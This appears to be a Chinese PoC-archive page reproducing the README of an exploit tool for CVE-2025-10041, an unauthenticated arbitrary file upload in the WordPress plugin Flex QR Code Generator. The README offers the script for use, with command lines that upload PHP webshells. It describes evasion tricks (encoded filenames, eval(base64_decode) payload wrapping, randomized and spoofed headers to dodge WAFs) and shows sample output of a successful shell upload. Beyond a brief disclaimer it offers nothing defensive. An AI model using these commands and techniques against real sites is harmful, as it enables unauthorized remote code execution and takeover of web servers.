关联漏洞
标题:
WordPress plugin Flex QR Code Generator 代码问题漏洞
(CVE-2025-10041)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台具有在基于PHP和MySQL的服务器上架设个人博客网站的功能。WordPress plugin是一个应用插件。 WordPress plugin Flex QR Code Generator 1.2.5及之前版本存在代码问题漏洞,该漏洞源于save_qr_code_to_db函数缺少文件类型验证,可能导致未经验证的攻击者上传任意文件并执行远程代码。
描述
Flex QR Code Generator <= 1.2.5 - Unauthenticated Arbitrary File Upload
介绍
# CVE-2025-10041
Flex QR Code Generator <= 1.2.5 - Unauthenticated Arbitrary File Upload
# 🚨 Flex QR Code Generator ≤ 1.2.5 - Unauthenticated Arbitrary File Upload
---
## 📝 Description
The **Flex QR Code Generator** plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the `save_qr_code_to_db()` function in all versions up to, and including, `1.2.5`.
This allows **unauthenticated attackers** to upload malicious files to the affected site's server, potentially leading to remote code execution.
- **CVE:** `CVE-2025-10041`
- **CVSS:** `9.8 (Critical)`
---
## 💡 About This Script
`CVE-2025-10041.py` is a professional exploit tool designed to automate the attack by leveraging this vulnerability.
It provides advanced features for bypassing common protections and encoding techniques.
---
## ⚙️ Features
- **Automatic vulnerability detection** (version check)
- **Arbitrary file upload** (including PHP webshells)
- **Filename encoding bypass**: Base64 or URL encoding
- **Content encoding bypass**: PHP base64 wrapper for shell code
- **Randomized HTTP headers** to evade basic WAFs
- **Custom header support**
- **Full command-line interface** with argument parsing and help message
---
## 🖥️ Usage
### 1. **Basic Exploit**
```bash
python3 CVE-2025-10041.py -u http://target.com
```
### 2. **Shell Filename Encoding**
```bash
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url
```
### 3. **Shell Content Encoding**
```bash
python3 CVE-2025-10041.py -u http://target.com --encode_content base64
```
### 4. **Custom Shell Filename**
```bash
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php
```
### 5. **Advanced (Combine Options)**
```bash
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php
```
### 6. **Custom Headers**
```bash
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"
```
---
## 🆘 Help
To see all available options and usage instructions:
```bash
python3 CVE-2025-10041.py --help
```
---
## 🔓 Bypass Techniques
- **Filename encoding**: Some servers block `.php` or suspicious names; encoding may evade filters.
- **Content encoding**: Wrapping shell code in `eval(base64_decode(...))` may bypass content filters.
- **Random headers**: Rotating user-agent, referer, and cookies to avoid detection.
- **Custom headers**: Add your own headers for advanced evasion.
---
## 📋 Example Output
```
Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}
```
---
## ⚠️ Disclaimer
This script is provided **for educational, research, and authorized penetration testing purposes only**.
**Unauthorized use** against systems you do not own or have explicit permission to test is strictly prohibited and illegal.
The author is **not responsible** for any misuse or damage caused by this tool.
---
## ✍️ By:
*Nxploited (Khaled Alenazi)*
---
文件快照
[4.0K] /data/pocs/c9fb5487c26b60f466a60d2cb4d9fe682675fd50
├── [6.5K] CVE-2025-10041.py
├── [1.5K] LICENSE
├── [3.2K] README.md
└── [ 17] requirements.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。